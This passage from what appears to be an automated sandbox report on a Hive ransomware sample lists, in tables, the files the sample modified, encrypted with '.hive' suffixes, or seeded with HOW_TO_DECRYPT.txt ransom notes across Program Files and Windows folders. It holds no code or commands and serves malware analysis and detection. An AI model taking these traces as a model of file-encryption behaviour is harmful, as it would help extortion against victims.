| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\css\settings.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OUTLVBS.DLL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.151\psuser_64.dll.-uYcD1toMB6z-bE3g_VWOZdsFKYB17Nw4Hd7fllFEAk.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\css\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\bin\policytool.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB1B.BDR | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Eirunepe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar.-uYcD1toMB6z-bE3g_VWOWYmM4bVA6goIhfl0etOVCg.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Data.Entity.Resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\RSSFeeds.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWS.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Easter | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\sw\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\Java\jre7\bin\plugin2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\ink\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\es-ES\DVDMaker.exe.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena.-uYcD1toMB6z-bE3g_VWOejkriX1C3kBXs7XK-NDOTE.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\RSSFeeds.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libnormvol_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\SETUP.CHM | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\bin\instrument.dll.-uYcD1toMB6z-bE3g_VWOTM_qx8rQvwbv9OeH7Mlaxw.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcanvas_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Windows Media Player\Network Sharing\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Faculty.accdt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\settings.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscene_plugin.dll.-uYcD1toMB6z-bE3g_VWOZckA1cwiKxC3-vmLcM_dxA.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Branding\Basebrd\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\MiguiControls\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\770a605d5193c730225204fa780278ae\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_server-help-chm.mmc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_6fe1f4a7f8512ee9\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-dskquota.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_a35ddd3ab3e846e1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-feedback-service_31bf3856ad364e35_6.1.7600.16385_none_d5c0e508aa96a650\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-help-netvsta.resources_31bf3856ad364e35_6.1.7600.16385_it-it_8e2308b4c72ddb0e\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-btpanui-mui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_742ca32d0094a20a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_prnhp005.inf.resources_31bf3856ad364e35_6.1.7600.16385_en-us_89c102ed2ea8f023\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-d..utoenroll.resources_31bf3856ad364e35_6.1.7600.16385_it-it_47b8ac96851475dc\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-scripting.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2d85ca15abc04414\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_netnvma.inf.resources_31bf3856ad364e35_6.1.7600.16385_it-it_5cd47ea41c470020\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-servicereportingapi_31bf3856ad364e35_6.1.7600.16385_none_6c7678cbda7098f8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-i..l-keyboard-0000042c_31bf3856ad364e35_6.1.7600.16385_none_59634f5e6fa7d5d1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-ie-feedsbs.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_edf96fb1262f5b5c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_netfx35linq-system....dynamicdata.design_31bf3856ad364e35_6.1.7601.17514_none_f48e45c7055224f8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\inf\.NET CLR Networking 4.0.0.0\000D\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\msil_microsoft.iis.power...provider.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_8f36c53b01dec296\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-mfdvdec_31bf3856ad364e35_6.1.7600.16385_none_64a6ece3617cfb74\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-r..lperclass.resources_31bf3856ad364e35_6.1.7600.16385_it-it_56ef5165204df522\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\msil_msbuild.resources_b03f5f7f11d50a3a_3.5.7600.16385_ja-jp_586fdad8bd134e99\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_netfx-sbs_sys_data_dll_31bf3856ad364e35_6.1.7600.16385_none_fe6017304e1a4816\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\System.XML.resources\2.0.0.0_es_b77a5c561934e089\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-ndisuio.resources_31bf3856ad364e35_6.1.7600.16385_es-es_f8133cc8594b3790\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_wcf-m_smsvchost_perf_c_ini_31bf3856ad364e35_6.1.7600.16385_none_902b82bc25e07ac6\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\msil_microsoft.grouppolicy.reporting_31bf3856ad364e35_6.1.7601.17514_none_4c14798809666596\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-blb-cli-main_31bf3856ad364e35_6.1.7600.16385_none_a749cec7a8b6bf08\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-help-mail.resources_31bf3856ad364e35_6.1.7600.16385_de-de_00ed58017fd687e8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-shunimpl_31bf3856ad364e35_6.1.7601.17514_none_b3bc7baa4af52181\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-audio-mci_31bf3856ad364e35_6.1.7600.16385_none_1ce3af494d8b953d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-ldap-client.resources_31bf3856ad364e35_6.1.7600.16385_de-de_32516987997ca2b8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-ieframe.resources_31bf3856ad364e35_8.0.7600.16385_es-es_0640ddf35e8847b1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-l..epremiumn.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_bc8aa7bd88265509\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-netplwiz.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2dd66c79c7e4f8e2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\msil_system.data.oracleclient.resources_b77a5c561934e089_6.1.7600.16385_it-it_e8dad23a13148696\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-m..fications.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_8b669fa14daef0eb\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-class_ss.resources_31bf3856ad364e35_6.1.7600.16385_en-us_9c43114bf49ad2c9\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-i..l-keyboard-0001040e_31bf3856ad364e35_6.1.7600.16385_none_fd64cf5361a6c8d6\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-s..ty-syskey.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_47ae60c666d2a843\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-i..tional-codepage-864_31bf3856ad364e35_6.1.7600.16385_none_cebf380cfc84b5bf\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-b..trics-cpl.resources_31bf3856ad364e35_6.1.7600.16385_it-it_296d0df052df9526\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-http-api.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_53ea200d3ef98f2e\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-powercfg.resources_31bf3856ad364e35_6.1.7600.16385_en-us_84ef507e8404018b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-i..onal-codepage-28592_31bf3856ad364e35_6.1.7600.16385_none_b188802cfdb67997\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-previousversions-adm_31bf3856ad364e35_6.1.7600.16385_none_41d785d4f443b620\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-ie-behaviors.resources_31bf3856ad364e35_8.0.7600.16385_de-de_9916db26952fe7f2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-i..ltinstall.resources_31bf3856ad364e35_6.1.7600.16385_de-de_07c23c1fe40f7920\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_security-malware-wi..er-events.resources_31bf3856ad364e35_6.1.7600.16385_en-us_dab3100a21f7543b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-wininit.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9c4b10f07cfccf53\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-wlanui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_269cc1254400eed5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-c..r-name-ui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_a2020e67811e5799\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-h..-iisbasic.resources_31bf3856ad364e35_6.1.7600.16385_de-de_230604a78e189958\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-mobsync.resources_31bf3856ad364e35_6.1.7600.16385_es-es_d761dac9339ff88c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_prnrc004.inf_31bf3856ad364e35_6.1.7600.16385_none_21e7809d8e910def\Amd64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-scripting-jscript_31bf3856ad364e35_11.2.9600.16428_none_6f8ba5f740934aae\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-i..tbranding.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_3f9f9ef99cdb9cde\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-directx-direct3d11_31bf3856ad364e35_7.1.7601.16492_none_3ef665796f74e084\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-netprofui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_3cfdaed76b6ce5f9\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-tasklist.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1c4d3cb94d962c50\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-h..centercpl.resources_31bf3856ad364e35_6.1.7600.16385_de-de_fdec13235c1fa8e5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-o..s-service.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_56fb8cc6dcb2acfb\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
